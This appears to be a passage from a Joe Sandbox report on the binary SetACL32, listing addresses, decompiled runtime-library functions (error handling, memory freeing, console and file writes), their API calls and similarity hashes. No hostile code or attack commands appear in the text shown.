              0x012d724a
              0x012d724a
              0x012d724a
              0x012d7246
              0x012d7241
              0x012d72c3
              0x012d72cb
              0x012d72cd
              0x012d72cf
              0x012d72d7
              0x012d72dc
              0x012d72dd
              0x012d72e2
              0x012d72e3
              0x012d72e6
              0x012d7300
              0x012d7303
              0x012d7308
              0x012d730a
              0x00000000
              0x012d730c
              0x012d7318
              0x012d731b
              0x012d731c
              0x012d731e
              0x012d7341
              0x012d7343
              0x012d735a
              0x012d7361
              0x012d7366
              0x00000000
              0x012d7345
              0x012d734c
              0x012d7351
              0x00000000
              0x012d7351
              0x012d7320
              0x012d7327
              0x012d732c
              0x012d732d
              0x012d732d
              0x012d7332
              0x00000000
              0x012d7332
              0x012d731e
              0x012d72e8
              0x012d72ee
              0x012d72f0
              0x012d72f2
              0x012d72fb
              0x00000000
              0x012d72f4
              0x012d72f4
              0x012d72f7
              0x012d7371
              0x012d7371
              0x012d7376
              0x012d7379
              0x012d737a
              0x012d737b
              0x012d7382
              0x012d7384
              0x012d7389
              0x012d738c
              0x012d73aa
              0x012d73ad
              0x012d73b2
              0x012d73b4
              0x00000000
              0x012d73b6
              0x012d73c2
              0x012d73c6
              0x012d73c8
              0x012d73ed
              0x012d73ef
              0x012d7408
              0x012d740f
              0x00000000
              0x012d73f1
              0x012d73f1
              0x012d73fa
              0x012d73ff
              0x00000000
              0x012d73ff
              0x012d73ca
              0x012d73ca
              0x012d73ca
              0x012d73d3
              0x012d73d8
              0x012d73d9
              0x012d73d9
              0x00000000
              0x012d73de
              0x012d73c8
              0x012d738e
              0x012d7394
              0x012d7396
              0x012d7398
              0x012d73a5
              0x00000000
              0x012d739a
              0x012d739a
              0x012d739d
              0x012d7417
              0x012d7417
              0x012d739f
              0x012d739f
              0x012d739f
              0x012d739f
              0x012d73a1
              0x012d73a1
              0x012d73a1
              0x012d739d
              0x012d7398
              0x012d741a
              0x012d7422
              0x012d7424
              0x012d7424
              0x012d742b
              0x012d72f9
              0x012d7369
              0x012d7369
              0x012d736b
              0x00000000
              0x012d736d
              0x012d7370
              0x012d7370
              0x012d736b
              0x012d72f7
              0x012d72f2
              0x012d72d1
              0x012d72d6
              0x012d72d6

              APIs
              • GetLastError.KERNEL32(?,?,?,012D4163,01307070,0000000C), ref: 012D7225
              • _free.LIBCMT ref: 012D7282
              • _free.LIBCMT ref: 012D72B8
              • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,012D4163,01307070,0000000C), ref: 012D72C3
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast_free
              • String ID: @Mhv
              • API String ID: 2283115069-3595611156
              • Opcode ID: 8b83e34e060b64774b9d4c7039e98cdd5f04b435010a57902e66ba593c911a5f
              • Instruction ID: cc5547c267a5d2f0edd24e09a66021c8918650be81dadafe1a96dabdbe14ded6
              • Opcode Fuzzy Hash: 8b83e34e060b64774b9d4c7039e98cdd5f04b435010a57902e66ba593c911a5f
              • Instruction Fuzzy Hash: 421186323341436EF6262579DC8CE3A35AAABE577DB250639F725971C5DE6A8C018310
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D7377 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 85%
              			E012D7377(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x13091a0; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E012DA7C4(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E012D7FB2(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E012DA7C4(__eflags,  *0x13091a0, _t18);
							if(__eflags != 0) {
								E012D704E(_t18, 0x130b248);
								E012D800F(0);
								goto L13;
							} else {
								_t13 = 0;
								E012DA7C4(__eflags,  *0x13091a0, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E012DA7C4(0,  *0x13091a0, 0);
							_push(0);
							L9:
							E012D800F();
							goto L4;
						}
					}
				} else {
					_t18 = E012DA785(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x13091a0; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}








              0x012d7382
              0x012d7384
              0x012d7389
              0x012d738c
              0x012d73aa
              0x012d73ad
              0x012d73b2
              0x012d73b4
              0x00000000
              0x012d73b6
              0x012d73c2
              0x012d73c6
              0x012d73c8
              0x012d73ed
              0x012d73ef
              0x012d7408
              0x012d740f
              0x00000000
              0x012d73f1
              0x012d73f1
              0x012d73fa
              0x012d73ff
              0x00000000
              0x012d73ff
              0x012d73ca
              0x012d73ca
              0x012d73ca
              0x012d73d3
              0x012d73d8
              0x012d73d9
              0x012d73d9
              0x00000000
              0x012d73de
              0x012d73c8
              0x012d738e
              0x012d7394
              0x012d7398
              0x012d73a5
              0x00000000
              0x012d739a
              0x012d739d
              0x012d7417
              0x012d7417
              0x012d739f
              0x012d739f
              0x012d739f
              0x012d73a1
              0x012d73a1
              0x012d73a1
              0x012d739d
              0x012d7398
              0x012d741a
              0x012d7422
              0x012d742b

              APIs
              • GetLastError.KERNEL32(?,?,?,012D3E45,012D8035,?,?,012D6ACD), ref: 012D737C
              • _free.LIBCMT ref: 012D73D9
              • _free.LIBCMT ref: 012D740F
              • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,012D3E45,012D8035,?,?,012D6ACD), ref: 012D741A
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast_free
              • String ID: @Mhv
              • API String ID: 2283115069-3595611156
              • Opcode ID: 31a357a024728c2a1e097e0787c2e75fa7eb06095ff197b12eaa31559ddadeb8
              • Instruction ID: ccf04c32043f086770f8b046216b6b1c0d9a52209b1bc559d4f4656fa24c6139
              • Opcode Fuzzy Hash: 31a357a024728c2a1e097e0787c2e75fa7eb06095ff197b12eaa31559ddadeb8
              • Instruction Fuzzy Hash: B611E9323342036EF7262679DC8AE3A35ADEBD577DB250239FA15971C5DE698C008310
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D65CA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 25%
              			E012D65CA(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x12ee308(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






              0x012d65d0
              0x012d65d4
              0x012d65df
              0x012d65e7
              0x012d65f2
              0x012d65f8
              0x012d65fc
              0x012d6603
              0x012d6609
              0x012d6609
              0x012d660b
              0x012d6610
              0x00000000
              0x012d6615
              0x012d661c

              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,012D65BF,?,?,012D6587,?,?,?), ref: 012D65DF
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 012D65F2
              • FreeLibrary.KERNEL32(00000000,?,?,012D65BF,?,?,012D6587,?,?,?), ref: 012D6615
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: d0cf9e1abf3d95b5e218c20a523f98dc487e371bef7923fc985aa7b22089f38c
              • Instruction ID: c244c2fc20efb8412da2aa12853378fdd1688a2bae1a49841a9d4533803fc4f3
              • Opcode Fuzzy Hash: d0cf9e1abf3d95b5e218c20a523f98dc487e371bef7923fc985aa7b22089f38c
              • Instruction Fuzzy Hash: F1F0A030A1121AFFEB219B55ED0EBDEBFB8EB00756F150074FA00A5190CB758E10DB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012E58C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E012E58C0(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x1309970, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E012E58A9();
					E012E586B();
					_t13 = WriteConsoleW( *0x1309970, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




              0x012e58dd
              0x012e58e1
              0x012e58ee
              0x012e58f3
              0x012e590e
              0x012e590e
              0x012e5914

              APIs
              • WriteConsoleW.KERNEL32(00000000,00000010,?,00000000,00000000,?,012E48FC,00000000,00000001,00000000,00000000,?,012E1336,00000000,?,00000000), ref: 012E58D7
              • GetLastError.KERNEL32(?,012E48FC,00000000,00000001,00000000,00000000,?,012E1336,00000000,?,00000000,00000000,00000000,?,012E188A,?), ref: 012E58E3
                • Part of subcall function 012E58A9: CloseHandle.KERNEL32(FFFFFFFE,012E58F3,?,012E48FC,00000000,00000001,00000000,00000000,?,012E1336,00000000,?,00000000,00000000,00000000), ref: 012E58B9
              • ___initconout.LIBCMT ref: 012E58F3
                • Part of subcall function 012E586B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,012E589A,012E48E9,00000000,?,012E1336,00000000,?,00000000,00000000), ref: 012E587E
              • WriteConsoleW.KERNEL32(00000000,00000010,?,00000000,?,012E48FC,00000000,00000001,00000000,00000000,?,012E1336,00000000,?,00000000,00000000), ref: 012E5908
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID: @Mhv
              • API String ID: 2744216297-3595611156
              • Opcode ID: e479c9b8123ad4e0058a42e765408276e1391fc21d8799b4d29fdd0568f132ab
              • Instruction ID: 23e7447dd0ee73ec983ea033291365984aa08ef6f7f4455c3f24863f97200d96
              • Opcode Fuzzy Hash: e479c9b8123ad4e0058a42e765408276e1391fc21d8799b4d29fdd0568f132ab
              • Instruction Fuzzy Hash: C3F0303A021126BFCF331F95EC0CADA7FA6FF093A5F454421FE1999125CA328960DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012A58F0 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E012A58F0(intOrPtr* _a4) {
				char _v8;
				char _v16;
				void* _v20;
				char _v24;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t32;
				intOrPtr _t40;
				void* _t45;
				signed int _t50;
				signed int _t51;
				intOrPtr _t53;
				intOrPtr _t57;
				intOrPtr _t61;
				signed int _t69;
				intOrPtr* _t72;
				signed int _t74;
				void* _t80;

				_push(0xffffffff);
				_push(0x12e9b34);
				_push( *[fs:0x0]);
				_t32 =  *0x1309018; // 0xedd8d3b4
				_push(_t32 ^ _t74);
				 *[fs:0x0] =  &_v16;
				E012CA2B4( &_v24, 0);
				_v8 = 0;
				_t69 =  *0x130b70c; // 0x0
				_t53 =  *0x130b678; // 0x0
				if(_t69 == 0) {
					E012CA2B4( &_v20, _t69);
					_t80 =  *0x130b70c - _t69; // 0x0
					if(_t80 == 0) {
						_t50 =  *0x130a750; // 0x1
						_t51 = _t50 + 1;
						 *0x130a750 = _t51;
						 *0x130b70c = _t51;
					}
					E012CA30C( &_v20);
					_t69 =  *0x130b70c; // 0x0
				}
				_t57 =  *((intOrPtr*)(_a4 + 4));
				if(_t69 >=  *((intOrPtr*)(_t57 + 0xc))) {
					_t72 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t57 + 0x14)) == 0) {
						L11:
						if(_t72 != 0) {
							L19:
							E012CA30C( &_v24);
							 *[fs:0x0] = _v16;
							return _t72;
						}
						L12:
						if(_t53 == 0) {
							_push(8);
							_t72 = E012CAE5D(_t53, _t69, _t72, __eflags);
							_v20 = _t72;
							_v8 = 1;
							_t61 =  *((intOrPtr*)(_a4 + 4));
							__eflags = _t61;
							if(_t61 == 0) {
								_t40 = 0x12fbc24;
							} else {
								_t40 =  *((intOrPtr*)(_t61 + 0x18));
								__eflags = _t40;
								if(_t40 == 0) {
									_t40 = _t61 + 0x1c;
								}
							}
							E012A1550( &_v76, _t40);
							 *((intOrPtr*)(_t72 + 4)) = 0;
							 *_t72 = 0x12ef17c;
							E012A1620( &_v76);
							_a4 = _t72;
							_v8 = 2;
							E012C9D99(__eflags, _t72);
							 *((intOrPtr*)( *_t72 + 4))();
							 *0x130b678 = _t72;
						} else {
							_t72 = _t53;
						}
						goto L19;
					}
					_t45 = E012C9DC5();
					if(_t69 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t69 * 4));
					goto L11;
				}
				_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) + _t69 * 4));
				if(_t72 != 0) {
					goto L19;
				}
				goto L8;
			}
























              0x012a58f3
              0x012a58f5
              0x012a5900
              0x012a5907
              0x012a590e
              0x012a5912
              0x012a591d
              0x012a5922
              0x012a5929
              0x012a592f
              0x012a5937
              0x012a593d
              0x012a5942
              0x012a5948
              0x012a594a
              0x012a594f
              0x012a5950
              0x012a5955
              0x012a5955
              0x012a595d
              0x012a5962
              0x012a5962
              0x012a596b
              0x012a5971
              0x012a5983
              0x012a5983
              0x012a5985
              0x012a5989
              0x012a599b
              0x012a599d
              0x012a5a10
              0x012a5a13
              0x012a5a1d
              0x012a5a2b
              0x012a5a2b
              0x012a599f
              0x012a59a1
              0x012a59a7
              0x012a59ae
              0x012a59b3
              0x012a59b6
              0x012a59bd
              0x012a59c0
              0x012a59c2
              0x012a59d0
              0x012a59c4
              0x012a59c4
              0x012a59c7
              0x012a59c9
              0x012a59cb
              0x012a59cb
              0x012a59c9
              0x012a59d9
              0x012a59e1
              0x012a59e8
              0x012a59ee
              0x012a59f3
              0x012a59f7
              0x012a59fb
              0x012a5a07
              0x012a5a0a
              0x012a59a3
              0x012a59a3
              0x012a59a3
              0x00000000
              0x012a59a1
              0x012a598b
              0x012a5993
              0x00000000
              0x00000000
              0x012a5998
              0x00000000
              0x012a5998
              0x012a5976
              0x012a597b
              0x00000000
              0x00000000
              0x00000000

              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 012A591D
              • std::_Lockit::_Lockit.LIBCPMT ref: 012A593D
              • std::_Lockit::~_Lockit.LIBCPMT ref: 012A595D
              • std::_Facet_Register.LIBCPMT ref: 012A59FB
              • std::_Lockit::~_Lockit.LIBCPMT ref: 012A5A13
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
              • String ID:
              • API String ID: 459529453-0
              • Opcode ID: 2d0ca98ae777bec8674946ddb6efe072dc2e54b8f2231ee318a023352a94d767
              • Instruction ID: ce66add98eae0692c569851bd614d006e5d7c6135ca6d7ce693a044d1a591be7
              • Opcode Fuzzy Hash: 2d0ca98ae777bec8674946ddb6efe072dc2e54b8f2231ee318a023352a94d767
              • Instruction Fuzzy Hash: 9E41F331A20216DFDB22DF58D490B6BBBF8FF11B20F58815ED946AB241DB71A905CBC1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D7927 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E012D7927(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x1309128; // 0x130917c
					if(_t23 != 0) {
						E012D800F(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x130912c; // 0x130ae6c
					if(_t24 != 0) {
						E012D800F(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1309130; // 0x130ae6c
					if(_t25 != 0) {
						E012D800F(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1309158; // 0x1309180
					if(_t26 != 0) {
						E012D800F(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x130915c; // 0x130ae70
					if(_t27 != 0) {
						return E012D800F(_t6);
					}
				}
				return _t6;
			}










              0x012d792d
              0x012d7932
              0x012d7936
              0x012d793c
              0x012d793f
              0x012d7944
              0x012d7948
              0x012d794e
              0x012d7951
              0x012d7956
              0x012d795a
              0x012d7960
              0x012d7963
              0x012d7968
              0x012d796c
              0x012d7972
              0x012d7975
              0x012d797a
              0x012d797b
              0x012d797e
              0x012d7984
              0x00000000
              0x012d798c
              0x012d7984
              0x012d798f

              APIs
              • _free.LIBCMT ref: 012D793F
                • Part of subcall function 012D800F: HeapFree.KERNEL32(00000000,00000000,?,012D6ACD), ref: 012D8025
                • Part of subcall function 012D800F: GetLastError.KERNEL32(?,?,012D6ACD), ref: 012D8037
              • _free.LIBCMT ref: 012D7951
              • _free.LIBCMT ref: 012D7963
              • _free.LIBCMT ref: 012D7975
              • _free.LIBCMT ref: 012D7987
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 2477770baaba6dd5413f3fcbfc20225fcf4e013c1fc9ab196ae0445c896bbf3e
              • Instruction ID: c4dd64fa81e31c9435fb93867eb783463a5e3f6aa88d0c32bd7881803a05d8cc
              • Opcode Fuzzy Hash: 2477770baaba6dd5413f3fcbfc20225fcf4e013c1fc9ab196ae0445c896bbf3e
              • Instruction Fuzzy Hash: 0DF03633524202ABD635EA6CE489D6A77DDEA08728B64280AF248D7641C734F8808754
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012E17CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E012E17CC(signed int _a4, void* _a8, signed int _a12) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _v40;
				char _v44;
				void* _t58;
				signed int _t66;
				signed int _t69;
				intOrPtr _t70;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t82;
				signed int _t85;
				signed int _t92;
				void* _t93;
				signed int _t95;
				signed int _t97;
				signed int _t101;
				intOrPtr _t102;
				signed int _t103;
				signed int _t104;
				signed int _t108;
				signed int _t110;
				void* _t112;

				_t95 = _a12;
				_t58 = _a8;
				_v8 = _t58;
				_v20 = _t95;
				_t108 = _a4;
				if(_t95 == 0) {
					L37:
					__eflags = 0;
					return 0;
				}
				_t116 = _t58;
				if(_t58 != 0) {
					_t101 = _t108 >> 6;
					_t104 = (_t108 & 0x0000003f) * 0x38;
					_v12 = _t101;
					_t102 =  *((intOrPtr*)(0x130b340 + _t101 * 4));
					_v16 = _t104;
					_t92 =  *((intOrPtr*)(_t102 + _t104 + 0x29));
					__eflags = _t92 - 2;
					if(_t92 == 2) {
						L6:
						__eflags =  !_t95 & 0x00000001;
						if(__eflags == 0) {
							goto L2;
						}
						L7:
						__eflags =  *(_t102 + _t104 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E012E409B(_t108, 0, 0, 2);
							_t112 = _t112 + 0x10;
						}
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t69 = E012E1373(_t102, __eflags, _t108);
						__eflags = _t69;
						if(_t69 == 0) {
							_t97 = _v12;
							_t103 = _v16;
							_t70 =  *((intOrPtr*)(0x130b340 + _t97 * 4));
							__eflags =  *((char*)(_t70 + _t103 + 0x28));
							if( *((char*)(_t70 + _t103 + 0x28)) >= 0) {
								_t93 = _v8;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t73 = WriteFile( *(_t70 + _t103 + 0x18), _t93, _v20,  &_v40, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									_v44 = GetLastError();
								}
								goto L26;
							}
							_t93 = _v8;
							_t82 = _t92;
							__eflags = _t82;
							if(_t82 == 0) {
								E012E13E4( &_v44, _t108, _t93, _v20);
								goto L15;
							}
							_t85 = _t82 - 1;
							__eflags = _t85;
							if(_t85 == 0) {
								_t84 = E012E15A8( &_v44, _t108, _t93, _v20);
								goto L15;
							}
							__eflags = _t85 != 1;
							if(_t85 != 1) {
								goto L28;
							}
							_t84 = E012E14BF( &_v44, _t108, _t93, _v20);
							goto L15;
						} else {
							__eflags = _t92;
							if(__eflags == 0) {
								_t93 = _v8;
								_t84 = E012E0F61(__eflags,  &_v44, _t108, _t93, _v20);
								L15:
								L13:
								L26:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								L27:
								_t97 = _v12;
								_t103 = _v16;
								L28:
								_t74 = _v28;
								__eflags = _t74;
								if(_t74 != 0) {
									return _t74 - _v24;
								}
								_t76 = _v32;
								__eflags = _t76;
								if(_t76 == 0) {
									__eflags =  *( *((intOrPtr*)(0x130b340 + _t97 * 4)) + _t103 + 0x28) & 0x00000040;
									if(__eflags == 0) {
										L35:
										 *((intOrPtr*)(E012D3E40(__eflags))) = 0x1c;
										_t66 = E012D3E2D(__eflags);
										 *_t66 =  *_t66 & 0x00000000;
										L3:
										return _t66 | 0xffffffff;
									}
									__eflags =  *_t93 - 0x1a;
									if(__eflags == 0) {
										goto L37;
									}
									goto L35;
								}
								_t110 = 5;
								__eflags = _t76 - _t110;
								if(__eflags != 0) {
									_t66 = E012D3E0A(_t76);
								} else {
									 *((intOrPtr*)(E012D3E40(__eflags))) = 9;
									_t66 = E012D3E2D(__eflags);
									 *_t66 = _t110;
								}
								goto L3;
							}
							__eflags = _t92 - 1 - 1;
							_t93 = _v8;
							if(_t92 - 1 > 1) {
								goto L27;
							}
							E012E130B( &_v44, _t93, _v20);
							goto L13;
						}
					}
					__eflags = _t92 - 1;
					if(_t92 != 1) {
						goto L7;
					}
					goto L6;
				}
				L2:
				 *(E012D3E2D(_t116)) =  *_t64 & 0x00000000;
				 *((intOrPtr*)(E012D3E40( *_t64))) = 0x16;
				_t66 = E012CF34F();
				goto L3;
			}
































              0x012e17d4
              0x012e17d7
              0x012e17da
              0x012e17dd
              0x012e17e2
              0x012e17e8
              0x012e19a7
              0x012e19a7
              0x00000000
              0x012e19a7
              0x012e17ee
              0x012e17f0
              0x012e1816
              0x012e181c
              0x012e181f
              0x012e1822
              0x012e1829
              0x012e182c
              0x012e1830
              0x012e1833
              0x012e183a
              0x012e183e
              0x012e1840
              0x00000000
              0x00000000
              0x012e1842
              0x012e1842
              0x012e1847
              0x012e1850
              0x012e1855
              0x012e1855
              0x012e185d
              0x012e185f
              0x012e1860
              0x012e1861
              0x012e1867
              0x012e1869
              0x012e18aa
              0x012e18ad
              0x012e18b0
              0x012e18b7
              0x012e18bc
              0x012e190a
              0x012e190f
              0x012e1912
              0x012e1913
              0x012e191d
              0x012e1923
              0x012e1925
              0x012e192d
              0x012e192d
              0x00000000
              0x012e1930
              0x012e18c1
              0x012e18c4
              0x012e18c4
              0x012e18c7
              0x012e18fc
              0x00000000
              0x012e18fc
              0x012e18c9
              0x012e18c9
              0x012e18cc
              0x012e18ec
              0x00000000
              0x012e18ec
              0x012e18ce
              0x012e18d1
              0x00000000
              0x00000000
              0x012e18dc
              0x00000000
              0x012e186b
              0x012e186b
              0x012e186d
              0x012e1897
              0x012e18a0
              0x012e18a5
              0x012e188d
              0x012e1933
              0x012e1936
              0x012e1937
              0x012e1938
              0x012e1939
              0x012e1939
              0x012e193c
              0x012e193f
              0x012e193f
              0x012e1942
              0x012e1944
              0x00000000
              0x012e19a2
              0x012e1946
              0x012e1949
              0x012e194b
              0x012e197e
              0x012e1983
              0x012e198a
              0x012e198f
              0x012e1995
              0x012e199a
              0x012e180a
              0x00000000
              0x012e180a
              0x012e1985
              0x012e1988
              0x00000000
              0x00000000
              0x00000000
              0x012e1988
              0x012e194f
              0x012e1950
              0x012e1952
              0x012e196c
              0x012e1954
              0x012e1959
              0x012e195f
              0x012e1964
              0x012e1964
              0x00000000
              0x012e1952
              0x012e1871
              0x012e1874
              0x012e1877
              0x00000000
              0x00000000
              0x012e1885
              0x00000000
              0x012e188a
              0x012e1869
              0x012e1835
              0x012e1838
              0x00000000
              0x00000000
              0x00000000
              0x012e1838
              0x012e17f2
              0x012e17f7
              0x012e17ff
              0x012e1805
              0x00000000

              APIs
                • Part of subcall function 012E0F61: GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 012E0FA9
              • WriteFile.KERNEL32(?,00000000,?,?,00000000,00000010,00000000,00000000,?,?,00000008,?,?,?,?,00000004), ref: 012E191D
              • GetLastError.KERNEL32(?,?,00000008,?,?,?,?,00000004), ref: 012E1927
              • __dosmaperr.LIBCMT ref: 012E196C
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
